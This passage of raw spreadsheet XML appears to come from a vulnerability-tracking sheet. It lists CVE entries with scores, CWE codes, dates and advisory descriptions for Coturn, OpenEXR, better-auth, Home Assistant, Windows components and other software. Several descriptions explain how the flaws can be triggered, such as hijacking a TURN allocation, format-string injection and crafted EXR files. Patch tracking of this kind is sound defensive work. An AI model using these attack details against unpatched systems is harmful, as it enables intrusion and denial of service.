      <c r="L3154" s="5" t="inlineStr">
        <is>
          <t>An unencrypted 'pause encryption request' message causes a denial of service in the BT122 module. 
See vulnerability B-E10 in the related paper below.</t>
        </is>
      </c>
      <c r="M3154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65934</t>
        </is>
      </c>
    </row>
    <row r="3155">
      <c r="A3155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65981</t>
        </is>
      </c>
      <c r="C3155" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3155" s="5" t="inlineStr"/>
      <c r="F3155" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3155" s="5" t="inlineStr"/>
      <c r="H3155" s="5" t="inlineStr"/>
      <c r="I3155" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J3155" s="5" t="inlineStr"/>
      <c r="K3155" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3155" s="5" t="inlineStr">
        <is>
          <t>Coturn is a free open source implementation of TURN and STUN Server. Prior to 4.15.0, a server using --mobility authenticates a resumed REFRESH request with the resuming user's credentials but does not verify that identity against the original allocation owner, allowing an authenticated attacker who obtains a victim MOBILITY-TICKET to receive and inject relayed traffic and consume the victim's quota. In the handle_turn_refresh resume branch, the victim allocation (orig_ss) is located solely by the attacker-controlled mobile id, and credentials are only adopted (via copy_auth_parameters) when the resuming session is unauthenticated. Because the attacker's session already has hmackey_set set to 1 from its own prior authentication (which is never reset for long-term-credential sessions), the credential copy is skipped and check_stun_auth validates the REFRESH against the attacker's own identity rather than the allocation owner's. This issue is fixed in version 4.15.0.</t>
        </is>
      </c>
      <c r="M3155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65981</t>
        </is>
      </c>
    </row>
    <row r="3156">
      <c r="A3156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66003</t>
        </is>
      </c>
      <c r="C3156" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3156" s="5" t="inlineStr"/>
      <c r="F3156" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3156" s="5" t="inlineStr">
        <is>
          <t>java, python</t>
        </is>
      </c>
      <c r="H3156" s="5" t="inlineStr"/>
      <c r="I3156" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J3156" s="5" t="inlineStr"/>
      <c r="K3156" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3156" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework written in Python and JavaScript. Prior to version 15.115.0, an access control bypass in the REST API allows a user to read data from Linked DocTypes that they are not authorized to access. When a document references another document through a Link field, the framework does not consistently enforce the linked DocType's own permissions when the record is retrieved through the REST API, so a low-privileged authenticated user can obtain fields from linked records outside their permitted scope. This issue is fixed in version 15.115.0.</t>
        </is>
      </c>
      <c r="M3156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66003</t>
        </is>
      </c>
    </row>
    <row r="3157">
      <c r="A3157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66060</t>
        </is>
      </c>
      <c r="C3157" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3157" s="5" t="inlineStr"/>
      <c r="F3157" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3157" s="5" t="inlineStr"/>
      <c r="H3157" s="5" t="inlineStr"/>
      <c r="I3157" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3157" s="5" t="inlineStr"/>
      <c r="K3157" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3157" s="5" t="inlineStr">
        <is>
          <t>Home Assistant is open source home automation software focused on local control and privacy.  Prior to 2026.5.3,  the Companion app treats tag links (NFC or QR) delivered through an OS-level routing mechanism as if they were physically scanned, without validating the calling app or prompting the user. As a result, any untrusted app on the device can forward an arbitrary tag to Home Assistant, causing it to execute the associated automation as though a legitimate user had scanned an authorized tag. This allows silent, unattended automation execution by untrusted local callers. This issue is fixed in version 2026.8.1.</t>
        </is>
      </c>
      <c r="M3157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66060</t>
        </is>
      </c>
    </row>
    <row r="3158">
      <c r="A3158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66061</t>
        </is>
      </c>
      <c r="C3158" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3158" s="5" t="inlineStr"/>
      <c r="F3158" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3158" s="5" t="inlineStr"/>
      <c r="H3158" s="5" t="inlineStr"/>
      <c r="I3158" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3158" s="5" t="inlineStr"/>
      <c r="K3158" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3158" s="5" t="inlineStr">
        <is>
          <t>Home Assistant is open source home automation software focused on local control and privacy.  Prior to 2026.5.0, the iOS Companion app treats tag links (NFC or QR) delivered through an OS-level routing mechanism such as iOS universal links as if they were physically scanned, without validating the calling app or prompting the user. As a result, any untrusted app on the device can forward an arbitrary tag to Home Assistant, causing it to execute the associated automation as though a legitimate user had scanned an authorized tag. This allows silent, unattended automation execution by untrusted local callers. This issue has been fixed in version 2026.5.0.</t>
        </is>
      </c>
      <c r="M3158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66061</t>
        </is>
      </c>
    </row>
    <row r="3159">
      <c r="A3159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66305</t>
        </is>
      </c>
      <c r="C3159" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3159" s="5" t="inlineStr"/>
      <c r="F3159" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3159" s="5" t="inlineStr"/>
      <c r="H3159" s="5" t="inlineStr"/>
      <c r="I3159" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3159" s="5" t="inlineStr"/>
      <c r="K3159" s="5" t="inlineStr">
        <is>
          <t>CWE-603</t>
        </is>
      </c>
      <c r="L3159" s="5" t="inlineStr">
        <is>
          <t>Use of client-side authentication in Skype for Business allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M3159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66305</t>
        </is>
      </c>
    </row>
    <row r="3160">
      <c r="A3160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67199</t>
        </is>
      </c>
      <c r="C3160" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3160" s="5" t="inlineStr"/>
      <c r="F3160" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3160" s="5" t="inlineStr"/>
      <c r="H3160" s="5" t="inlineStr"/>
      <c r="I3160" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3160" s="5" t="inlineStr"/>
      <c r="K3160" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L3160" s="5" t="inlineStr">
        <is>
          <t>Perspective 5.0.0 contains a denial of service vulnerability that allows remote attackers to block the server event loop indefinitely by submitting a crafted expression containing unbounded for or while loop constructs in a TableMakeViewReq message. Attackers can embed an arbitrarily large iteration count in an expression column evaluated once per table row, causing the Tornado IOLoop to block without any iteration cap, deadline, or cancellation check, rendering the server unresponsive to all connected clients.</t>
        </is>
      </c>
      <c r="M3160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67199</t>
        </is>
      </c>
    </row>
    <row r="3161">
      <c r="A3161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67329</t>
        </is>
      </c>
      <c r="C3161" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3161" s="5" t="inlineStr"/>
      <c r="F3161" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3161" s="5" t="inlineStr"/>
      <c r="H3161" s="5" t="inlineStr"/>
      <c r="I3161" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J3161" s="5" t="inlineStr"/>
      <c r="K3161" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3161" s="5" t="inlineStr">
        <is>
          <t>@better-auth/stripe versions &gt;= 1.4.11 and &lt; 1.6.21, and &gt;= 1.7.0-beta.0 and &lt; 1.7.0-beta.10, contain an authorization bypass in organization subscription actions. The middleware validates the organization ID taken from the request query string against the authorizeReference callback, but the handler reads the organization ID only from the request body and falls back to the caller's active organization from their session. When these differ, an authenticated member of multiple organizations can perform subscription actions (cancel, change plan, restore, billing portal access) against an organization they belong to but should not manage, and can access another organization's billing details including payment methods, invoices, and subscription state.</t>
        </is>
      </c>
      <c r="M3161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67329</t>
        </is>
      </c>
    </row>
    <row r="3162">
      <c r="A3162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67337</t>
        </is>
      </c>
      <c r="C3162" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3162" s="5" t="inlineStr"/>
      <c r="F3162" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3162" s="5" t="inlineStr"/>
      <c r="H3162" s="5" t="inlineStr"/>
      <c r="I3162" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J3162" s="5" t="inlineStr"/>
      <c r="K3162" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L3162" s="5" t="inlineStr">
        <is>
          <t>better-auth versions before 1.4.9 contain a two-factor authentication bypass vulnerability when session.cookieCache is enabled. Attackers with valid primary credentials can access authenticated routes without completing second-factor verification by exploiting premature session caching.</t>
        </is>
      </c>
      <c r="M3162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67337</t>
        </is>
      </c>
    </row>
    <row r="3163">
      <c r="A3163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68513</t>
        </is>
      </c>
      <c r="C3163" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3163" s="5" t="inlineStr"/>
      <c r="F3163" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3163" s="5" t="inlineStr"/>
      <c r="H3163" s="5" t="inlineStr"/>
      <c r="I3163" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3163" s="5" t="inlineStr"/>
      <c r="K3163" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L3163" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. Versions 3.3.0 through 3.3.12 and 3.4.0 through 3.4.13 contain a heap buffer overflow in PyOpenEXR triggered by a channel-name key collision between literal and prefixed RGB channels. When separate_channels=false, PyOpenEXR maps each physical channel name through channelNameToRGBA() and coalesces the results into a shared RGB array. A crafted flat scanline EXR that contains both a literal channel such as left and prefixed channels such as left.R, left.G, and left.B causes these names to collide, so the wrapper reuses an undersized two-dimensional NumPy array for the coalesced RGB slices and writes out of bounds when OpenEXR.File(path) decodes the pixels. This issue is fixed in versions 3.3.13 and 3.4.14.</t>
        </is>
      </c>
      <c r="M3163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68513</t>
        </is>
      </c>
    </row>
    <row r="3164">
      <c r="A3164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68515</t>
        </is>
      </c>
      <c r="C3164" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3164" s="5" t="inlineStr"/>
      <c r="F3164" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3164" s="5" t="inlineStr"/>
      <c r="H3164" s="5" t="inlineStr"/>
      <c r="I3164" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3164" s="5" t="inlineStr"/>
      <c r="K3164" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L3164" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. In versions before 3.2.11, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13, exrmultiview can write past a heap allocation when it combines two attacker-supplied, individually valid scanline EXR files whose union dataWindow is not aligned to one view's channel subsampling. The utility allocates sampled channel storage using a truncated union_width / xSampling, then reads the sampled input through a Slice based on the misaligned union window, producing a heap out-of-bounds write. The trigger is normal public-tool processing, such as exrmultiview left A.exr right B.exr out.exr with crafted but valid inputs, so this is not solely an API or caller-precondition issue. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="M3164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68515</t>
        </is>
      </c>
    </row>
    <row r="3165">
      <c r="A3165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68553</t>
        </is>
      </c>
      <c r="C3165" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3165" s="5" t="inlineStr"/>
      <c r="F3165" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3165" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H3165" s="5" t="inlineStr"/>
      <c r="I3165" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3165" s="5" t="inlineStr"/>
      <c r="K3165" s="5" t="inlineStr">
        <is>
          <t>CWE-134</t>
        </is>
      </c>
      <c r="L3165" s="5" t="inlineStr">
        <is>
          <t>Coturn is a free open source implementation of TURN and STUN Server. Prior to 4.13.0, an authenticated TURN user can place printf-style format specifiers in the STUN USERNAME or REALM attribute, which passes is_secure_string() validation and is embedded into Redis keys at nine call sites in src/apps/relay/ns_ioalib_engine_impl.c. send_message_to_redis() in src/apps/relay/hiredis_libevent2.c then passes the attacker-controlled key as the format argument to redisAsyncCommand() while supplying only one variadic value, causing hiredis redisvFormatCommand() to read past the va_list. Exploitation can crash the coturn process and terminate active TURN sessions or disclose stack memory into Redis. This issue is fixed in version 4.13.0.</t>
        </is>
      </c>
      <c r="M3165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68553</t>
        </is>
      </c>
    </row>
    <row r="3166">
      <c r="A3166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68835</t>
        </is>
      </c>
      <c r="C3166" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3166" s="5" t="inlineStr"/>
      <c r="F3166" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3166" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3166" s="5" t="inlineStr"/>
      <c r="I3166" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3166" s="5" t="inlineStr"/>
      <c r="K3166" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3166" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68835</t>
        </is>
      </c>
    </row>
    <row r="3167">
      <c r="A3167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68846</t>
        </is>
      </c>
      <c r="C3167" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3167" s="5" t="inlineStr"/>
      <c r="F3167" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3167" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3167" s="5" t="inlineStr"/>
      <c r="I3167" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3167" s="5" t="inlineStr"/>
      <c r="K3167" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3167" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68846</t>
        </is>
      </c>
    </row>
    <row r="3168">
      <c r="A3168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68889</t>
        </is>
      </c>
      <c r="C3168" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3168" s="5" t="inlineStr"/>
      <c r="F3168" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3168" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3168" s="5" t="inlineStr"/>
      <c r="I3168" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3168" s="5" t="inlineStr"/>
      <c r="K3168" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L3168" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68889</t>
        </is>
      </c>
    </row>
    <row r="3169">
      <c r="A3169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68893</t>
        </is>
      </c>
      <c r="C3169" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3169" s="5" t="inlineStr"/>
      <c r="F3169" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3169" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3169" s="5" t="inlineStr"/>
      <c r="I3169" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3169" s="5" t="inlineStr"/>
      <c r="K3169" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3169" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Licensing Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68893</t>
        </is>
      </c>
    </row>
    <row r="3170">
      <c r="A3170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69093</t>
        </is>
      </c>
      <c r="C3170" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3170" s="5" t="inlineStr"/>
      <c r="F3170" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3170" s="5" t="inlineStr"/>
      <c r="H3170" s="5" t="inlineStr"/>
      <c r="I3170" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J3170" s="5" t="inlineStr"/>
      <c r="K3170" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3170" s="5" t="inlineStr">
        <is>
          <t>Admidio before 5.0.11 does not validate the adm_csrf_token in modules/category-report/preferences.php, which performs persistent Category Report configuration changes based on GET parameters (delete and copy). An attacker can trick an authenticated administrator into visiting a crafted URL to delete or duplicate Category Report configurations, affecting the integrity and availability of that module's configuration.</t>
        </is>
      </c>
      <c r="M3170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69093</t>
        </is>
      </c>
    </row>
    <row r="3171">
      <c r="A3171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69244</t>
        </is>
      </c>
      <c r="C3171" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3171" s="5" t="inlineStr"/>
      <c r="F3171" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3171" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H3171" s="5" t="inlineStr"/>
      <c r="I3171" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J3171" s="5" t="inlineStr"/>
      <c r="K3171" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-400, CWE-416</t>
        </is>
      </c>
      <c r="L3171" s="5" t="inlineStr">
        <is>
          <t>AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to 3.14.3, an out-of-bounds heap read could occur in the C response parser while building an error message for a malformed response. An attacker controlled server, or possibly an accidental response, could trigger a DoS in the client. The vulnerable path was error message construction in aiohttp/_http_parser.pyx, where an llhttp error-position pointer was used to build a snippet for malformed chunked responses and malformed request or response bytes at the buffer end. This issue is fixed in version 3.14.3.</t>
        </is>
      </c>
      <c r="M3171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69244</t>
        </is>
      </c>
    </row>
    <row r="3172">
      <c r="A3172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69262</t>
        </is>
      </c>
      <c r="C3172" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3172" s="5" t="inlineStr"/>
      <c r="F3172" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3172" s="5" t="inlineStr"/>
      <c r="H3172" s="5" t="inlineStr"/>
      <c r="I3172" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3172" s="5" t="inlineStr"/>
      <c r="K3172" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3172" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, `DELETE /api/v1/chatflows/:id` authorized requests with checkAnyPermission('chatflows:delete,agentflows:delete'), so possession of either permission was sufficient to reach the delete path. The delete logic then resolved the target record only by id and workspaceId and did not validate the target resource type, allowing a caller with only agentflows:delete to delete a CHATFLOW and a caller with only chatflows:delete to delete an AGENTFLOW in the same workspace. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M3172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69262</t>
        </is>
      </c>
    </row>
    <row r="3173">
      <c r="A3173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69272</t>
        </is>
      </c>
      <c r="C3173" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3173" s="5" t="inlineStr"/>
      <c r="F3173" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3173" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3173" s="5" t="inlineStr"/>
      <c r="I3173" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3173" s="5" t="inlineStr"/>
      <c r="K3173" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3173" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69272</t>
        </is>
      </c>
    </row>
    <row r="3174">
      <c r="A3174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69274</t>
        </is>
      </c>
      <c r="C3174" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3174" s="5" t="inlineStr"/>
      <c r="F3174" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3174" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3174" s="5" t="inlineStr"/>
      <c r="I3174" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3174" s="5" t="inlineStr"/>
      <c r="K3174" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3174" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69274</t>
        </is>
      </c>
    </row>
    <row r="3175">
      <c r="A3175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69296</t>
        </is>
      </c>
      <c r="C3175" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3175" s="5" t="inlineStr"/>
      <c r="F3175" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3175" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3175" s="5" t="inlineStr"/>
      <c r="I3175" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3175" s="5" t="inlineStr"/>
      <c r="K3175" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3175" s="5" t="inlineStr">
        <is>
